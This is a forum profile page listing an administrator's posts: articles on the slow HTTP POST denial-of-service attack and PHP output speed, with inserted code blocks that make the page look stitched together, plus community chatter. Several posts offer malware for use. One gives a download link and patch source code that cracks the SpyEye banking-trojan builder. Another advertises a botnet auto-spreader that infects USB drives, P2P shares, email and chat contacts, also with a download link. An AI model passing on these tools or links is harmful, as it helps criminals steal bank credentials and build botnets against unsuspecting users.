Nytro
Administrators
Posts: 18777
Days Won: 732

Everything posted by Nytro

  1. HTTP Post Denial Of Service: more dangerous than initially thought

    by Bogdan Calin on November 22, 2010 – 8:47 pm

    Wong Onn Chee and Tom Brennan from OWASP recently published a paper* presenting a new denial of service attack against web servers. What's special about this denial of service attack is that it's very hard to fix because it relies on a generic problem in the way the HTTP protocol works. Therefore, to properly fix it would mean to break the protocol, and that's certainly not desirable. The authors list some possible workarounds but in my opinion none of them really fixes the problem.

    The attack explained

    An attacker establishes a number of connections with the web server. Each one of these connections contains a Content-Length header with a large number (e.g. Content-Length: 10000000). Therefore, the web server will expect 10000000 bytes from each one of these connections. The trick is not to send all this data at once but to send it character by character over a long period of time (e.g. 1 character every 10-100 seconds). The web server will keep these connections open for a very long time, until it receives all the data. In this time, other clients will have a hard time connecting to the server, or even worse will not be able to connect at all because all the available connections are taken/busy.

    In this blog post, I would like to expand on the effect of this denial of service attack against Apache. First, I would like to start with one of their affirmations: "Hence, any website which has forms, i.e. accepts HTTP POST requests, is susceptible to such attacks." At least in the case of Apache, this is not correct. It doesn't matter if the website has forms or not. Any Apache web server is vulnerable to this attack. The web server doesn't decide if the resource can accept POST data before receiving the full request.

    I've created a very simple Acunetix WVS test script to reproduce this attack and prove this point: the script will create 256 sockets, establish a TCP connection to the web server on each socket and start sending data slowly (1 character per second).

    Screenshot: http://www.acunetix.com/blog/wp-content/uploads/2010/11/wvs-scripting1.png

    As you can see in the code from the screenshot, I'm making an HTTP POST request to a nonexistent file (POST /aaaaaaaaaaaa HTTP/1.1). After a few seconds, the web server becomes completely unresponsive. As soon as I stop the script, the web server starts responding again. Therefore, any Apache web server is vulnerable to this attack.

    How many connections are required until the web server stops responding? Their paper mentions 20.000 connections as an example. They also make the following note: "Apache requires lesser number of connections due to mandatory client or thread limit in httpd.conf." Interesting. How many fewer connections? If we look in the Apache 1.3 documentation, we find the following information:

    "The MaxClients directive sets the limit on the number of simultaneous requests that can be supported; not more than this number of child server processes will be created. Syntax: MaxClients number. Default: MaxClients 256"

    Therefore, by default Apache 1.3 only allows 256 connections. Therefore, an attacker only needs to steal 256 connections before the web server stops responding. It's the same situation even with Apache 2.0.

    During my tests, I noticed the following error message in the Apache error log:

        $tail -f /var/log/apache2/error.log
        [Mon Nov 22 15:23:17 2010] [notice] Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g configured — resuming normal operations
        [Mon Nov 22 15:24:46 2010] [error] server reached MaxClients setting, consider raising the MaxClients setting

    In conclusion, the denial of service attack affects any Apache web server and one requires only a few hundred connections to make the server completely unresponsive. And based on my knowledge there is no proper fix for it. Apache's response was:

    "What you described is a known attribute (read: flaw) of the HTTP protocol over TCP/IP. The Apache HTTP project declines to treat this expected use-case as a vulnerability in the software."

    And Microsoft's response:

    "While we recognize this is an issue, this issue does not meet our bar for the release of a security update. We will continue to track this issue and the changes I mentioned above for release in a future service pack."

    That's pretty scary!

    * The paper published by Wong Onn Chee and Tom Brennan can be found here: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf

    Source: HTTP Post Denial Of Service: more dangerous than initially thought | Acunetix Web Application Security Blog
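The server-side counterpart of the behaviour described above, as an added example that is not part of the Acunetix post and not Apache code: a toy worker that honours Content-Length before it knows anything about the request path (so a POST to a nonexistent file occupies it just the same), but bounds how long it will wait for the body, both in total and between bytes. This is the minimum-data-rate idea that Apache later shipped as mod_reqtimeout (the RequestReadTimeout directive, from httpd 2.2.15). The simulate() helper, the socketpair client and the request bytes are constructed for the demo; the deadline values are arbitrary.

```python
import socket
import threading
import time


class SlowBodyError(Exception):
    """Raised when a request body is not delivered fast enough."""


def parse_head(head: bytes):
    """Split 'METHOD path HTTP/1.x' plus header lines into (method, path, headers);
    header names are lower-cased so lookups are case-insensitive."""
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def read_body(conn, length, total_deadline, idle_timeout):
    """Read exactly `length` body bytes. Give up if the whole body has not arrived
    within `total_deadline` seconds or if nothing arrives for `idle_timeout` seconds.
    Without these limits the worker sits in recv() for as long as the peer trickles."""
    start = time.monotonic()
    buf = bytearray()
    while len(buf) < length:
        remaining = total_deadline - (time.monotonic() - start)
        if remaining <= 0:
            raise SlowBodyError(f"body deadline hit after {len(buf)}/{length} bytes")
        conn.settimeout(min(idle_timeout, remaining))
        try:
            chunk = conn.recv(min(4096, length - len(buf)))
        except socket.timeout:
            raise SlowBodyError(f"no body data for {idle_timeout}s after {len(buf)}/{length} bytes")
        if not chunk:
            raise SlowBodyError("peer closed before the body was complete")
        buf += chunk
    return bytes(buf)


def handle_request(conn, total_deadline=5.0, idle_timeout=1.0):
    """One worker's handling of one connection. Content-Length is honoured before the
    path is even looked at, which is the point made in the post above. Returns
    (verdict, payload) where verdict is 'ok', 'rejected' or 'closed'."""
    try:
        conn.settimeout(idle_timeout)
        head = b""
        while b"\r\n\r\n" not in head:
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                return ("rejected", b"no complete request head within idle timeout")
            if not chunk:
                return ("closed", b"")
            head += chunk
        head, _, early_body = head.partition(b"\r\n\r\n")
        _method, _path, headers = parse_head(head)
        length = int(headers.get("content-length", "0"))
        try:
            rest = read_body(conn, max(0, length - len(early_body)), total_deadline, idle_timeout)
        except SlowBodyError as exc:
            return ("rejected", str(exc).encode())   # worker is freed instead of waiting
        return ("ok", early_body + rest)
    finally:
        conn.close()


def simulate(client_delay, body=b"a=1&b=2", total_deadline=2.0, idle_timeout=0.3):
    """Run one worker against a constructed client that sends the head at once and then
    the body one byte every `client_delay` seconds (0 = as fast as possible).
    Returns (verdict, payload, seconds the worker was occupied)."""
    server_side, client_side = socket.socketpair()
    request_head = ("POST /aaaaaaaaaaaa HTTP/1.1\r\nHost: example.test\r\n"
                    f"Content-Length: {len(body)}\r\n\r\n").encode()

    def client():
        try:
            client_side.sendall(request_head)
            for i in range(len(body)):
                time.sleep(client_delay)
                client_side.sendall(body[i:i + 1])
        except OSError:
            pass            # the worker hung up on us: expected in the slow case
        finally:
            client_side.close()

    t = threading.Thread(target=client, daemon=True)
    t.start()
    started = time.monotonic()
    verdict, payload = handle_request(server_side, total_deadline, idle_timeout)
    elapsed = time.monotonic() - started
    t.join()
    return verdict, payload, elapsed


if __name__ == "__main__":
    print("fast client, limits on:   ", simulate(0.0))
    print("slow client, limits on:   ", simulate(0.5))
    print("slow client, limits off:  ", simulate(0.2, total_deadline=60, idle_timeout=60))
```

The third run is the unprotected case: the worker returns "ok" but stays busy for the whole trickle (here about 1.4 s for 7 bytes; with the 10000000-byte Content-Length from the post it would never return). The second run shows the same client being cut off after one idle timeout, which is what keeps the connection count below MaxClients.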
  2. AndrusKanu: We are not adding a holiday header, we are just replacing the old one. Regarding the quote, I don't care how "cool" they are as long as they have nothing to do with RST. Let's put it simply: "To be or not to be, that is the question". The idea is for it to fit the present context perfectly, our activity. I mean not just any quote that merely has something to do with a computer fits, or who knows what generic quote that means nothing to us.
  3. Come up with more ideas for "texts", then we'll put it to a vote.
  4. First of all, a warn. Second, if you had read the last line you would have seen where I copied the information from.
  5. PHP Output and Concatenation Speed Comparison

    A few simple and useful tests for the most "optimizationist" among us.

    There are a few commonly asked PHP questions: What is the difference between the print and echo constructs? What is the difference between single and double quotes? These questions are both answered very sufficiently by doing a quick search on Google. However, one thing often overlooked is the speed comparison between print, echo and single and double quotes. So, I thought I would do a bit of a test…

    Setting up my test

    After reading Adam Wright's response to this question on Stack Overflow, I thought it was a great starting point and had some great potential to expand. The basics of my test will be based on the following code:

        <?php
        function timefunc($function, $runs) {
            $times = array();
            for ($i = 0; $i < $runs; $i++) {
                ob_start();                  // capture the test's output so it is not printed
                $time = microtime(true);     // float seconds; the bare microtime() string form makes the subtraction wrong across a second boundary
                call_user_func($function);
                $times[$i] = microtime(true) - $time;
                ob_end_clean();
            }
            return array_sum($times) / $runs;
        }
        ?>

    It is almost the same as Adam's, however I have introduced an output buffer so I am able to easily test my output speeds. My output will be an average speed for the function that has been run. To make my test fair, each of my functions to test is going to be based on the following code:

        function test1() {
            $foo = 'some words';
            for ($i = 0; $i < 10000; $i++)
                $t = "these are some words"; // Test in here
        }

    For a fair comparison, I am always going to declare the $foo variable even if it is not used in the test; this means the only thing that changes with each test will be my test line.

    What is quicker – Single or Double quotes?

    The first test I am going to carry out is the difference between single and double quotes when inserting variables into a string. The variable I am going to insert will be "some words", with my starting string being "these are ".

    I am going to carry out the following tests:

        <?php
        /* Simple starting references */
        $t = "these are some words";   // Double quotes
        $t = 'these are some words';   // Single quotes
        /* Tests */
        $t = "these are $foo";         // Double quotes
        $t = "these are {$foo}";       // Double quotes with brackets
        $t = "these are " . $foo;      // Double quotes with concatenation
        $t = 'these are ' . $foo;      // Single quotes with concatenation
        ?>

    As you should know, single quotes don't allow parsing of variables straight into the string, and therefore I have only included them here with concatenation, as that is the only way to get the variable into the output. The results are:

        Simple starting references
        Double quotes                        0.0023348
        Single quotes                        0.0024924
        Tests
        Double quotes                        0.0039244
        Double quotes with brackets          0.0040088
        Double quotes with concatenation     0.0027065
        Single quotes with concatenation     0.0026829

    Very, very interesting! From this, you can see that using concatenation with either double or single quotes, the speed decrease is only ~16%. There is also negligible difference between single and double quotes both in the reference test and also in concatenation; I would put the small differences in the test down to noise during my testing. I think the interesting thing found here is that placing the variable directly into double quotes causes a speed decrease of ~68%; again I would put the difference between bracketed and non-bracketed down to noise during my tests as it is a tiny difference.

    What is quicker – echo or print?

    Now, what is the quickest way to output information in PHP? It is commonly known that print and echo are used to output data. There are however two other ways to output data directly to the output data stream, the output and stdout data streams. To output to these, you can use PHP's normal file handling functions as they deal directly with streams.

    Firstly, I will run some simple output tests:

        <?php
        /* The tests */
        echo "these are some words";                               // Echo with double quotes
        echo 'these are some words';                               // Echo with single quotes
        print "these are some words";                              // Print with double quotes
        print 'these are some words';                              // Print with single quotes
        file_put_contents("php://output", 'these are some words'); // Output stream
        file_put_contents("php://stdout", 'these are some words'); // Stdout stream
        ?>

    The results:

        Echo with double quotes      0.0020305
        Echo with single quotes      0.001976
        Print with double quotes     0.0021426
        Print with single quotes     0.0021427
        Output stream                0.0206471
        Stdout stream                0.0518192

    This time, I think the findings are even more interesting. As expected, print is slower than echo by ~6%. Also, writing straight to the output stream causes quite a large decrease in speed. This is probably caused by the fact we are having to use the file_put_contents function to write the output and not a built-in constructor. What I find very interesting is the fact that writing to stdout is ~150% slower than writing to the output stream.

    Let's put them together – output and concatenation comparison

    Now we have seen the speed differences between outputs and concatenations, let's put them together and see what happens. Here are the tests:

        <?php
        /* Tests */
        echo "these are $foo";           // Echo double
        echo "these are {$foo}";         // Echo double with brackets
        echo "these are " . $foo;        // Echo double with concatenation
        echo 'these are ' . $foo;        // Echo single with concatenation
        print "these are $foo";          // Print double
        print "these are {$foo}";        // Print double with brackets
        print "these are " . $foo;       // Print double with concatenation
        print 'these are ' . $foo;       // Print single with concatenation
        printf('these are %s', $foo);    // Printf
        ?>

    Most of these should make perfect sense; the only addition I have made is the printf function. This allows a string replace functionality that outputs its result. Quite simply, in the format above, it provides the same functionality as all the other tests. So, here are the results:

        Output Tests With Concatenation
        Echo with double quotes                    0.0043563
        Echo with double quotes (brackets)         0.0043074
        Echo with double quotes (concatenation)    0.0032709
        Echo with single quotes (concatenation)    0.0032543
        Print with double quotes                   0.0045534
        Print with double quotes (brackets)        0.0057546
        Print with double quotes (concatenation)   0.0034584
        Print with single quotes (concatenation)   0.0036391
        Printf                                     0.0110374

    Nothing amazing here really, everything has already been explained previously. Probably the only thing to note is that the printf function takes ~92% longer than the next longest output (print with double quotes & brackets).

    So, I think this proves that the concatenation operator (.) in PHP provides the quickest way for placing variables into a string. It also doesn't seem to make much difference whether you use single or double quotes throughout your scripts. The important thing to note from these tests, I think, is that the output functions take a significant amount of time longer to run than the output constructs built into PHP. If you can think of any output methods I have forgotten, let me know in the comments. If you have found this post interesting, please read through some of my other posts and subscribe to my RSS feed. Thanks for reading!

    Source and the nicely formatted article: PHP Output and Concatenation Speed Comparison – Murray Picton
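A complete, runnable version of the benchmark described above, added here as an example; it is not the article's code. It keeps the same structure (output buffering around each run, an averaged wall-clock time, a 10000-iteration loop per test body) but uses hrtime() for nanosecond resolution and prints each variant relative to the fastest one, so the "~16%" and "~68%" style comparisons fall out directly. The php://stdout case is left out on purpose: it bypasses the output buffer, so in a loop it would print to the terminal ten thousand times. The RUNS constant and the labels are my own choices.

```php
<?php
declare(strict_types=1);

const ITERATIONS = 10000;   // loop count inside each test body, as in the article
const RUNS       = 20;      // how many times each test is repeated and averaged (my choice)

/** Average wall-clock seconds for one call of $function, measured over $runs runs. */
function timefunc(callable $function, int $runs): float
{
    $totalNs = 0;
    for ($i = 0; $i < $runs; $i++) {
        ob_start();                       // swallow whatever the test prints
        $start = hrtime(true);
        $function();
        $totalNs += hrtime(true) - $start;
        ob_end_clean();
    }
    return $totalNs / $runs / 1e9;        // nanoseconds -> seconds
}

$foo = 'some words';

// Each entry is one of the article's test lines wrapped in the same 10000-iteration loop.
$tests = [
    'assign: "..." literal (reference)'   => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = "these are some words"; },
    "assign: '...' literal (reference)"   => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = 'these are some words'; },
    'assign: "$foo" interpolation'        => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = "these are $foo"; },
    'assign: "{$foo}" interpolation'      => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = "these are {$foo}"; },
    'assign: "..." . $foo'                => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = "these are " . $foo; },
    "assign: '...' . \$foo"               => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) $t = 'these are ' . $foo; },
    'echo "$foo"'                         => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) echo "these are $foo"; },
    'echo "..." . $foo'                   => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) echo "these are " . $foo; },
    'print "$foo"'                        => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) print "these are $foo"; },
    'print "..." . $foo'                  => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) print "these are " . $foo; },
    "printf('... %s')"                    => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) printf('these are %s', $foo); },
    'file_put_contents(php://output)'     => function () use ($foo) { for ($i = 0; $i < ITERATIONS; $i++) file_put_contents('php://output', 'these are ' . $foo); },
];

// Warm-up pass so the first measured test does not pay for opcache/JIT and allocator start-up.
foreach ($tests as $fn) {
    timefunc($fn, 1);
}

$results = [];
foreach ($tests as $label => $fn) {
    $results[$label] = timefunc($fn, RUNS);
}
asort($results);                          // fastest first
$fastest = reset($results);

printf("%-36s %12s %11s\n", 'test', 'avg seconds', 'vs fastest');
foreach ($results as $label => $seconds) {
    printf("%-36s %12.7f %+10.0f%%\n", $label, $seconds, ($seconds / $fastest - 1) * 100);
}
```

Run it with `php bench.php`; absolute numbers depend on the machine and PHP version, which is why the last column (percentage slower than the fastest variant) is the one worth comparing against the article's figures.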
  6. SpyEye.1.1.39.Builder+Patch

    I haven't tried it, I don't know if it's infected, I'm not responsible for anything. I don't even know if it has been posted before.

    1. Start SpyEye.exe
    2. Start SpyEyePatch.exe - Click OK
    3. Click OK in the SpyEye error message and enjoy the Builder

    Download: http://www.multiupload.com/ZEAYSEAU4W

    SpyEyePatch SourceCode:

        #include <Windows.h>
        #include <tlhelp32.h>
        #include <string.h>

        typedef LONG (NTAPI *_NtSuspendProcess)(IN HANDLE ProcessHandle);
        typedef LONG (NTAPI *_NtResumeProcess)(IN HANDLE ProcessHandle);

        int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
        {
            TOKEN_PRIVILEGES priv;
            HANDLE hThis, hToken;
            LUID luid;

            /* Enable the debug privilege on our own token so the target process can be opened */
            hThis = GetCurrentProcess();
            OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
            LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
            priv.PrivilegeCount = 1;
            priv.Privileges[0].Luid = luid;
            priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            AdjustTokenPrivileges(hToken, FALSE, &priv, 0, 0, 0);
            CloseHandle(hToken);
            CloseHandle(hThis);

            HANDLE ProcessHandle = 0;
            _NtSuspendProcess NtSuspendProcess = 0;
            _NtResumeProcess NtResumeProcess = 0;
            PROCESSENTRY32 processInfo;
            processInfo.dwSize = sizeof(processInfo);
            HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
            CHAR processName[] = "SpyEye.exe";
            DWORD PID = 0;

            /* Addresses and bytes to write into the running SpyEye.exe */
            DWORD Patch1 = 0x4010C5;
            DWORD Patch2 = 0x4010CA;
            DWORD Patch3 = 0x4010CC;
            DWORD Patch4 = 0x4010CD;
            UCHAR PatchVal1[] = "\xB8\x0C\x11\x40\x00";
            UCHAR PatchVal2[] = "\xFF\xD0";
            UCHAR PatchVal3[] = "\x90";
            UCHAR PatchVal4[] = "\x90";

            /* NtSuspendProcess/NtResumeProcess are undocumented, so resolve them from ntdll at runtime */
            NtSuspendProcess = (_NtSuspendProcess)GetProcAddress(GetModuleHandle("ntdll"), "NtSuspendProcess");
            NtResumeProcess = (_NtResumeProcess)GetProcAddress(GetModuleHandle("ntdll"), "NtResumeProcess");

            if (processesSnapshot == INVALID_HANDLE_VALUE) {
                return 0;
            }

            /* Walk the process list and find the PID of SpyEye.exe */
            Process32First(processesSnapshot, &processInfo);
            while (Process32Next(processesSnapshot, &processInfo)) {
                if (!strcmp(processName, processInfo.szExeFile)) {
                    CloseHandle(processesSnapshot);
                    PID = processInfo.th32ProcessID;
                    break;
                }
            }

            if (PID != NULL) {
                //MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);
                ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
            }

            if (ProcessHandle != NULL) {
                /* Freeze the process, overwrite the four locations, then let it continue */
                NtSuspendProcess(ProcessHandle);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1) - 1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2) - 1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3) - 1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4) - 1, NULL);
                /*
                004010C5 B8 0C114000    MOV EAX,SpyEye.0040110C
                004010CA FFD0           CALL EAX
                004010CC 90             NOP
                004010CD 90             NOP
                */
                MessageBoxA(NULL, "SpyEye should have been patched now.\nJust press OK and enjoy", "SpyEye-Patch by Zer0Flag", 0);
                NtResumeProcess(ProcessHandle);
                CloseHandle(ProcessHandle);
            }
            return 0;
        }

    Source: SpyEye.1.1.39.Builder+Patch - r00tsecurity
  7. Project Blackout V2.5 - Amazing Auto-Spreader

    I haven't tried it, I don't know if it's infected, I'm not responsible for anything.

    Project Blackout V2.5 is made to spread your botnet, but it works on every .exe on the internet! Yes, this means: Keyloggers, RATS, Crypted files and much, much more!

    Automatically Download and Execute your bot on run
    Mass Email Spread (This is why gmail username and password is required)
    Infect all HTML documents
    Antis
    MSN Spread *Sends message to all online contacts getting them to download and run your virus*
    LAN Spread *This one is seriously amazing*
    P2P Spread - Limewire, eDonkey and much, much more *Amazing, just plain amazing. When you have over 100+ bots all hosting your virus on limewire you will be getting a fuckload of zombies*
    Skype spread *Send message to all online contacts getting them to download your virus*
    USB Spread *Its your basic, everyday, 100% working and stable USB auto-spread*
    Unique mutex. *This way your bot is unique, and other bots do not copy over yours*

    Download: http://uppit.com/v/ilj6tmmv
  8. I haven't tried it, I don't know if it's infected, I'm not responsible for anything. I think it has been posted before, but I don't think the download link was still working. Download: http://www.mediafire.com/?qvpj2us7oxg38cf Or: http://www.multiupload.com/3D4WKJL6JW
  9. The "big guys" have to react. There isn't much we can do, we can only wait. The manufacturers of routers, gateways, switches and other equipment, as well as the ISPs and the organizations that deal with standards, should take a stand, and as soon as possible. Yes, in my opinion the IPv4 addresses will run out on 12.12.2012, so the end of the world really is coming.
  10. Curiosity is our motivation, security is our hobby/job and information is our weapon. Or something like that.
  11. For "IT" I recommend "Digital Fortress" (Fortareata Digitala) by Dan Brown.
  12. And how did you "interact" with the exploit from Windows? Through that Share or through Internet Explorer?
  13. Yes, I like all the headers, I'm not very picky, but let's find the right text. Make a list of more "brilliant" texts and we'll put it to a vote.
  14. Hmm, maybe something like: "Access to information is a right, we support freedom of information." "Information is a right, we support this right".
  15. vBulletin 4

    Not like that, pack. I spent another whole day installing themes on localhost to see which ones would look more brilliant and they were all junk. Pick a few themes, better made, darker, I don't know, ones that look good.
  16. vBulletin 4

    A simple question: why? PS: If you find the X360 theme, I think that's what it's called, something similar to the current theme, we'll think about it some more.
  17. Yes, we need another text, at the moment I don't really have any ideas, come up with one yourselves.
  18. Hi. For now I don't know who you are, but changing usernames can cause a lot of confusion among the other users. But sometimes I do change a username, only for those with few posts.
  19. The "your mom is fat" thing is lame... In the meantime, think of a more suitable text, instead of "we don't care...".
  20. The animated one kind of hurts my eyes, but I like the other two. Let's see what the others say.
  21. I like it, but there should be something else on the right, or nothing at all. And those texts: shellcode, the ASM... They should be arranged differently, I don't know, so they blend better into the scene.
  22. Inj3ctor had a copy of milw0rm. As for Happy Ninjas, that's exactly the idea, nobody needs to know who they are, they're "underground".
  23. Yeah man, that's what I wanted to say, they just brag about things done by others. That's why they're losers.
  24. Defcon 2010 - Who cares about IPv6 - Sam Bowne

    I just watched it, I found it interesting and it presents a few things that should interest all of us, things worth knowing. Length: 26:57. Youtube: http://www.youtube.com/watch?v=zIUgH2wVt_0
  25. I don't know, probably quite a lot, there are many whole articles posted on the forum. It's not the members that take up much space.